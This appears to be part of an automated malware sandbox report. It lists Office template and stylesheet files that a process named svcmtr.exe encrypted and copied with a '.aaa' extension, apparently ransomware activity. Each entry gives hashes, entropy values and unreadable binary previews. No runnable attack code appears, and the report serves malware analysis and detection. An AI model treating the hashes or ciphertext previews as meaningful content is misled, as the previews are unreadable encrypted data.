                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....s.IQX.K.9...0....$.I.u..[@........<....2E.`...>).g...|...O...&.....e...-$,.~..ur........wfU...l.>..L..o5p.g.7....J..J.J.....uD...s.......@.:=....l...(P.{.T.'.....+%...{K.......ec@......e^...:.}..z.......M.>J..}.,.....^.|.t;..Z..c|*O.....F..dX...4g.S0.F...B`.jcn.`.C.gt...N.....u.JR..E.9.v.....l.+.3WM.S.>Q......<....)Hbl.8.U.]."nm.y..bx.A.N..lwPE.VX6^y=....'8..`.sfY..*.X...L..R..H...n.i...:..?&....W8..m.nyonBw..N.l>...\...x.'x{B..3..A.}.9O.........BJ...n...Z.9.....x.m.,d....fJ}...^...<.....z..._Q../..w?K...<.A...^|.R.3.........n|.|...!*..-....)=`..I)....q$WETpt......cu.^.3.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.XLS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.969496407988378
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoSa5P+lngzzOg8+GRXbjyLygjXQKOFPT7YvWcgVj9jXpmKI:GPzngxNMXbjyLygTfsqWnj/I
                                                                                                                          MD5:97D828637701229C46EFB47DC0BFE30E
                                                                                                                          SHA1:E55A7DFC2BB0ECD413A142B43C27B5083DB6CEE3
                                                                                                                          SHA-256:9A823EEE593AECCA2E03EEBC1672C640E64F3ABEDA12E3657A660884AC4B37DA
                                                                                                                          SHA-512:5973818530CACBDE2A6726C6C699189EEC2BA538F94C64CB6FA1BDB8558F8F923841B834C8381FD22EC1740C8A16E308B3E2823A43CF5EF9072D6D3E05C2889E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......EZk.i1>..2..."...ts...L.,..w..w...:......3<..dG-.....r....X.rA.5.[......m".hY.....Vt.....5..5.JD|.EJ?.C..8Lj.S..b!Q.a....RP.Oc.bs5A7.0,...{[.T~FS.+O7R...?Q...."..@..C..C..WaB.;Q........2U.V.i..........f...D.im6jnea.n..}.H.'.c.j.D...4..9......xe.....x...nr../....b?.V\.....$Pmn.xT|.C@.".......y.R..p...N......j...0-.t.ZH.P...Uy....ur..k]........c7.D^>..q%P.... .n...M.(.......p..|.ha..s.,].L.l..f8/...H.;.2./q.M.z.".82..R.'.V+...r....N..vR...N....7..5..4..z..;.........)..P.-...yf...6....!.`....q.{..)..D.~..D.dD.YF/.. [.t3.,.'.....[6.CNhZ.}.......Z.z.P....6...$....O2s

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.XLS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.969496407988378
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoSa5P+lngzzOg8+GRXbjyLygjXQKOFPT7YvWcgVj9jXpmKI:GPzngxNMXbjyLygTfsqWnj/I
                                                                                                                          MD5:97D828637701229C46EFB47DC0BFE30E
                                                                                                                          SHA1:E55A7DFC2BB0ECD413A142B43C27B5083DB6CEE3
                                                                                                                          SHA-256:9A823EEE593AECCA2E03EEBC1672C640E64F3ABEDA12E3657A660884AC4B37DA
                                                                                                                          SHA-512:5973818530CACBDE2A6726C6C699189EEC2BA538F94C64CB6FA1BDB8558F8F923841B834C8381FD22EC1740C8A16E308B3E2823A43CF5EF9072D6D3E05C2889E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......EZk.i1>..2..."...ts...L.,..w..w...:......3<..dG-.....r....X.rA.5.[......m".hY.....Vt.....5..5.JD|.EJ?.C..8Lj.S..b!Q.a....RP.Oc.bs5A7.0,...{[.T~FS.+O7R...?Q...."..@..C..C..WaB.;Q........2U.V.i..........f...D.im6jnea.n..}.H.'.c.j.D...4..9......xe.....x...nr../....b?.V\.....$Pmn.xT|.C@.".......y.R..p...N......j...0-.t.ZH.P...Uy....ur..k]........c7.D^>..q%P.... .n...M.(.......p..|.ha..s.,].L.l..f8/...H.;.2./q.M.z.".82..R.'.V+...r....N..vR...N....7..5..4..z..;.........)..P.-...yf...6....!.`....q.{..)..D.~..D.dD.YF/.. [.t3.,.'.....[6.CNhZ.}.......Z.z.P....6...$....O2s

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.DOC

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.988602165986239
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gi8HYg1mZ75L3tFX+JWk2bHAk8HySNUC5NQn3KSVW0emlLIJtTdPqI9tiD:Gi84HFLuJWXAk8HySiDn6AW0vsNna
                                                                                                                          MD5:0C5D0495B087D34521B0974F6759C34B
                                                                                                                          SHA1:808282B814E99680B847A24A9421FE29751F4B7D
                                                                                                                          SHA-256:EBB4FC79ACA34D99F48FF18D031ED5853F656F7687383536317131B4741C176B
                                                                                                                          SHA-512:EFD2304EB0A8046AC8D87B4B0B28D7E475E39E4E2749E6B30CF2DE5C3427B5797B8A62A379B483F47D94E52B0DA3D7037C8BD4B03EBB15FBCA0BD8FD8C0925AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...}.1=@.,.......\.N..N..$.#.~.....<H.:...Y..io<q..l.d..v4W4..W....(.3....j......3 .9.b..;.....|.m...F...J^.g..*wA%...P...7......t..|.....["a.....E..t...W. .v..t.I.C.+`tbVQ."B......8f...h..X...@g.,o.U..i&...E...R..^.-...-5..}.g....Q...N..[.{<H......R...._.........O.1Pw.l$...(BONF..yqq3.\M....eb.+fZ.(..{...=g..3..%=.....y.mv....xr<....(P...9l..../)..RL.D..!.X....P.t.:..\....?.6NS6........Uq!:Kh....3&%.N.....&@.0.H.T.R..&r..KP...O..1....R.'~..n....Y....M)......tz...)....3e.NW..G..7G....H.Xr][..O.....n.&H..d.......^_..,/.'...9.kv[.......7Y......9A...!.% .!.r.....+...[.@_vo..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.DOC.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.988602165986239
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gi8HYg1mZ75L3tFX+JWk2bHAk8HySNUC5NQn3KSVW0emlLIJtTdPqI9tiD:Gi84HFLuJWXAk8HySiDn6AW0vsNna
                                                                                                                          MD5:0C5D0495B087D34521B0974F6759C34B
                                                                                                                          SHA1:808282B814E99680B847A24A9421FE29751F4B7D
                                                                                                                          SHA-256:EBB4FC79ACA34D99F48FF18D031ED5853F656F7687383536317131B4741C176B
                                                                                                                          SHA-512:EFD2304EB0A8046AC8D87B4B0B28D7E475E39E4E2749E6B30CF2DE5C3427B5797B8A62A379B483F47D94E52B0DA3D7037C8BD4B03EBB15FBCA0BD8FD8C0925AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...}.1=@.,.......\.N..N..$.#.~.....<H.:...Y..io<q..l.d..v4W4..W....(.3....j......3 .9.b..;.....|.m...F...J^.g..*wA%...P...7......t..|.....["a.....E..t...W. .v..t.I.C.+`tbVQ."B......8f...h..X...@g.,o.U..i&...E...R..^.-...-5..}.g....Q...N..[.{<H......R...._.........O.1Pw.l$...(BONF..yqq3.\M....eb.+fZ.(..{...=g..3..%=.....y.mv....xr<....(P...9l..../)..RL.D..!.X....P.t.:..\....?.6NS6........Uq!:Kh....3&%.N.....&@.0.H.T.R..&r..KP...O..1....R.'~..n....Y....M)......tz...)....3e.NW..G..7G....H.Xr][..O.....n.&H..d.......^_..,/.'...9.kv[.......7Y......9A...!.% .!.r.....+...[.@_vo..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.PPT

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981412391394323
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gom+1E73mDO+R4OzYbqIJHCi0jU6VE4Xy0+ziCL2Zvn0wTCciLfobshBlaDLG:Gd+e7WDOGGq+iiILr+uBnZTFhbsOG
                                                                                                                          MD5:F7E6CEB5091A60021280A78E8885140D
                                                                                                                          SHA1:446391E1A2E1866A90AF72D2794C5C20EC8F76B5
                                                                                                                          SHA-256:D8B0CC4D36AB180BF86DC304CE5C7601EF9941E22D9CD6EB2F159957E5F4FEE8
                                                                                                                          SHA-512:0921B5713B4450ADBEF056B15BCC79DBC983AF3254C521998BD20FB263A35E5904C6E4BF61D865446950DCDF56EA072A265C7B3F72787F6BB91A072794789F66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[^...x.u......0...&..Kw..}?.;.......Z.i.q.L._A.v#z.o..6....x.+.uj.Dly..... ..o....z5.@8..{@..\6.K./"+....P.(.|....Fi@.mR..~G..M.]....<....m.Y.C.........#.Vz.!..9.#+..v........&....'....F..O..h&...s.....dn.7...9..~5.z'h..],....XC..w..|..Wf>1..eN/.'G..x~...h.....Z..U..p..T.\M?S"..i..........\.....D..x..,..`q...>...C3.8A...5.c.O...N.dS...NJ.A....i..4....,[...VP..@..I.J4.F...y..."Pi..........8.1...T...I..T1...A}......K}..}B~..}6.1.W..N..1......~.l.rv.j0.t.3....(...{.~...S?...[.2tQ...l..?..b..^.].e%.pX\......&.K.W].c..Q...|t.V.uV.Y..,.T.....wq/..}J*9.`IO......*u(uubt...|N...T.q

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.PPT.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981412391394323
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gom+1E73mDO+R4OzYbqIJHCi0jU6VE4Xy0+ziCL2Zvn0wTCciLfobshBlaDLG:Gd+e7WDOGGq+iiILr+uBnZTFhbsOG
                                                                                                                          MD5:F7E6CEB5091A60021280A78E8885140D
                                                                                                                          SHA1:446391E1A2E1866A90AF72D2794C5C20EC8F76B5
                                                                                                                          SHA-256:D8B0CC4D36AB180BF86DC304CE5C7601EF9941E22D9CD6EB2F159957E5F4FEE8
                                                                                                                          SHA-512:0921B5713B4450ADBEF056B15BCC79DBC983AF3254C521998BD20FB263A35E5904C6E4BF61D865446950DCDF56EA072A265C7B3F72787F6BB91A072794789F66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[^...x.u......0...&..Kw..}?.;.......Z.i.q.L._A.v#z.o..6....x.+.uj.Dly..... ..o....z5.@8..{@..\6.K./"+....P.(.|....Fi@.mR..~G..M.]....<....m.Y.C.........#.Vz.!..9.#+..v........&....'....F..O..h&...s.....dn.7...9..~5.z'h..],....XC..w..|..Wf>1..eN/.'G..x~...h.....Z..U..p..T.\M?S"..i..........\.....D..x..,..`q...>...C3.8A...5.c.O...N.dS...NJ.A....i..4....,[...VP..@..I.J4.F...y..."Pi..........8.1...T...I..T1...A}......K}..}B~..}6.1.W..N..1......~.l.rv.j0.t.3....(...{.~...S?...[.2tQ...l..?..b..^.].e%.pX\......&.K.W].c..Q...|t.V.uV.Y..,.T.....wq/..}J*9.`IO......*u(uubt...|N...T.q

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.XLS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.972852841079598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gog0hlz7Frv7AeOK9zc/eHVod6WLHGFQZ5CZGPUz6jtPaAs:GIhlBv7AeOocKwLHGuZ52GMw8As
                                                                                                                          MD5:13497EB70F861F0988671CA55A56948D
                                                                                                                          SHA1:ED7092CF409DACB0EA9533983FA8F50027275E14
                                                                                                                          SHA-256:673D5968CE1B4010629B3C6E7D421BFBDE5F9B1C176332AD68DF77B058823226
                                                                                                                          SHA-512:D7FC4B9FCA2C41C5C8A495BC0AB51CA1A7816D94A869DA1E675763BAD2DDEAC5FBD7953F7A7CAD4620C8DA3684ADB747D089A7EB635EFC56AE3F6C6BABAF8AD0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..XZ....by..)..Y..."...$..8.t.....Z..j..#.....!........D&...Wc.$.]u.njW.M5..s.....^.dA.D.....Pr...L?_w}.z.B.....e... ...<....k.......D.xC.)......ylL|..&....7.s`2q|.......D&YCm...l........N.... .A ..?H...@(.>Eo.sl.._....i)..'*t../.H..^...:K........v.~_.0...X/...........yG.J...zp#.Y2..X.Z..3.m..i<....^...,..[{+.\...(....~z.Af.s..4.6.]~Swq.?.]...0.....6...j.T...`..&........I.iRF..r...G......m.OC..<.vN...w7....H8.]9..!..%....r..M.h...U....+...f..$yxC.Rl0P.~O?...0<...+F>..8*U..t..a.m#.r.x.o;.S...k......m..>N.;-.\{..d...I@j..pQ.Cco.I.K_..$...3..^$..L.\...Ce...s.!j:..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.XLS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.972852841079598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gog0hlz7Frv7AeOK9zc/eHVod6WLHGFQZ5CZGPUz6jtPaAs:GIhlBv7AeOocKwLHGuZ52GMw8As
                                                                                                                          MD5:13497EB70F861F0988671CA55A56948D
                                                                                                                          SHA1:ED7092CF409DACB0EA9533983FA8F50027275E14
                                                                                                                          SHA-256:673D5968CE1B4010629B3C6E7D421BFBDE5F9B1C176332AD68DF77B058823226
                                                                                                                          SHA-512:D7FC4B9FCA2C41C5C8A495BC0AB51CA1A7816D94A869DA1E675763BAD2DDEAC5FBD7953F7A7CAD4620C8DA3684ADB747D089A7EB635EFC56AE3F6C6BABAF8AD0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..XZ....by..)..Y..."...$..8.t.....Z..j..#.....!........D&...Wc.$.]u.njW.M5..s.....^.dA.D.....Pr...L?_w}.z.B.....e... ...<....k.......D.xC.)......ylL|..&....7.s`2q|.......D&YCm...l........N.... .A ..?H...@(.>Eo.sl.._....i)..'*t../.H..^...:K........v.~_.0...X/...........yG.J...zp#.Y2..X.Z..3.m..i<....^...,..[{+.\...(....~z.Af.s..4.6.]~Swq.?.]...0.....6...j.T...`..&........I.iRF..r...G......m.OC..<.vN...w7....H8.]9..!..%....r..M.h...U....+...f..$yxC.Rl0P.~O?...0<...+F>..8*U..t..a.m#.r.x.o;.S...k......m..>N.;-.\{..d...I@j..pQ.Cco.I.K_..$...3..^$..L.\...Ce...s.!j:..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127054
                                                                                                                          Entropy (8bit):7.998469810574002
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:xET/+IUO1uigdZWV4c8MuicmNjxu4DFkPM5:x0/MOOWVAMui1Nk4yPM5
                                                                                                                          MD5:1502AE3E687FB14DA96F4C905F7DBA9C
                                                                                                                          SHA1:8BCB58355B57EC420D7BF5FE5636D523B4CFCB37
                                                                                                                          SHA-256:55EBA40339A797A63052745E97127E13B3A80B189C46D08BCCEEB40CB815F2C5
                                                                                                                          SHA-512:521FC3392587803F8F1003F6501D2094B5A4875DF343AABFC935DE9783FA3BF6019871891A7F5C1E5AC49C599F2591E9436934A9B13F8426B66CEAEE96490902
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...o.W.0...f(a.........wyx........0o... ..n.I'...%........#^..f.....@+.[{.......&..q........\....]...=....4.F(..F..K..*....6.!..XXvw..3...?.h.Ux.............!.."T./....r^.......Vz.h#~?.P0.n....>.."..;.'.....t.k.}..-...V.F.E.Td...Vz.{y@..8...dT..1. ..r...._.R..../.;./x.|..n.....9..vb..t..r.:`..Z......X...@..E;.......<C1..JD.......$.@.L.H*...0T0.u6V...}f.)..R`zq'...@...f3...c. wh.}l.gh....6t$(.i..51y..\..9..[.r.2.Pj09.....f...O........+...k...Jg..{..z.;...FYkY.=.!4n...7..*.....k.^....a<L..~_..rp.....3oK.'..Q`d.5....;EEl..z..\r.#4..V.)~....<....v;..Z..g=..DCA.yr.9D.Og

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127054
                                                                                                                          Entropy (8bit):7.998469810574002
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:xET/+IUO1uigdZWV4c8MuicmNjxu4DFkPM5:x0/MOOWVAMui1Nk4yPM5
                                                                                                                          MD5:1502AE3E687FB14DA96F4C905F7DBA9C
                                                                                                                          SHA1:8BCB58355B57EC420D7BF5FE5636D523B4CFCB37
                                                                                                                          SHA-256:55EBA40339A797A63052745E97127E13B3A80B189C46D08BCCEEB40CB815F2C5
                                                                                                                          SHA-512:521FC3392587803F8F1003F6501D2094B5A4875DF343AABFC935DE9783FA3BF6019871891A7F5C1E5AC49C599F2591E9436934A9B13F8426B66CEAEE96490902
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...o.W.0...f(a.........wyx........0o... ..n.I'...%........#^..f.....@+.[{.......&..q........\....]...=....4.F(..F..K..*....6.!..XXvw..3...?.h.Ux.............!.."T./....r^.......Vz.h#~?.P0.n....>.."..;.'.....t.k.}..-...V.F.E.Td...Vz.{y@..8...dT..1. ..r...._.R..../.;./x.|..n.....9..vb..t..r.:`..Z......X...@..E;.......<C1..JD.......$.@.L.H*...0T0.u6V...}f.)..R`zq'...@...f3...c. wh.}l.gh....6t$(.i..51y..\..9..[.r.2.Pj09.....f...O........+...k...Jg..{..z.;...FYkY.=.!4n...7..*.....k.^....a<L..~_..rp.....3oK.'..Q`d.5....;EEl..z..\r.#4..V.)~....<....v;..Z..g=..DCA.yr.9D.Og

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130398
                                                                                                                          Entropy (8bit):7.998168039977826
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:HK4LjNsOgWlwIc62Lir09sDNLvwa98DW5Th0:H+OdlLc6WuDNMKT+
                                                                                                                          MD5:AC2F85D273F3688CEB9E86D45119080C
                                                                                                                          SHA1:39F26E58A91CCBA24B5B3414C4445EB5DE2A99B1
                                                                                                                          SHA-256:D6E5BC6D4C15AC8F3223750AA8B05A8230ADAD4A68D5211E4ADE62B913532FC2
                                                                                                                          SHA-512:D5AEFB267537511D53E9D6ED6252321E30D28870704BBFE5E054341D3740E864D74D770F916C3467FA5DE646FC1AF6499EC979E76F36BDA36239080D23E913F2
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...3.h.p$.WD.~..u.....T.Y&.y...........m.9....j. ..SN.5.......T8z$...O,.B-}..j..ad.G..S..)z.._x...(.U....@m......6..J...q...w.<.D..x......?.....:.J.A.....%.\.....i..FK.....i..V......g}.m....PC..Ejh...B....e....;..<..%E,.C.Y..Z D.....Q.y.A..g:...E^..Zg78..\K!NMO.)4.-...|..'a.,.v.H..l1=Y....e..Yzf=.%....T.N..8.6d9..a......6..*.U.*\...caL.......$(g..h.._..R.V..l8.^M..i.>...T.xTS...o:.N......MDVv...C%.]-q<..p.x.........z3......}.(....d.t.....\&.hn=^2........+BT..F.Uy.WH...@..s.1..|4..m.Pb.P..j.h..b..^5.x......8.p..#-...<r......J#..p1p.......Lx(.U...o....q....T......ZL.....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130398
                                                                                                                          Entropy (8bit):7.998168039977826
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:HK4LjNsOgWlwIc62Lir09sDNLvwa98DW5Th0:H+OdlLc6WuDNMKT+
                                                                                                                          MD5:AC2F85D273F3688CEB9E86D45119080C
                                                                                                                          SHA1:39F26E58A91CCBA24B5B3414C4445EB5DE2A99B1
                                                                                                                          SHA-256:D6E5BC6D4C15AC8F3223750AA8B05A8230ADAD4A68D5211E4ADE62B913532FC2
                                                                                                                          SHA-512:D5AEFB267537511D53E9D6ED6252321E30D28870704BBFE5E054341D3740E864D74D770F916C3467FA5DE646FC1AF6499EC979E76F36BDA36239080D23E913F2
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...3.h.p$.WD.~..u.....T.Y&.y...........m.9....j. ..SN.5.......T8z$...O,.B-}..j..ad.G..S..)z.._x...(.U....@m......6..J...q...w.<.D..x......?.....:.J.A.....%.\.....i..FK.....i..V......g}.m....PC..Ejh...B....e....;..<..%E,.C.Y..Z D.....Q.y.A..g:...E^..Zg78..\K!NMO.)4.-...|..'a.,.v.H..l1=Y....e..Yzf=.%....T.N..8.6d9..a......6..*.U.*\...caL.......$(g..h.._..R.V..l8.^M..i.>...T.xTS...o:.N......MDVv...C%.]-q<..p.x.........z3......}.(....d.t.....\&.hn=^2........+BT..F.Uy.WH...@..s.1..|4..m.Pb.P..j.h..b..^5.x......8.p..#-...<r......J#..p1p.......Lx(.U...o....q....T......ZL.....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127438
                                                                                                                          Entropy (8bit):7.998541337307893
                                                                                                                          Encrypted:true
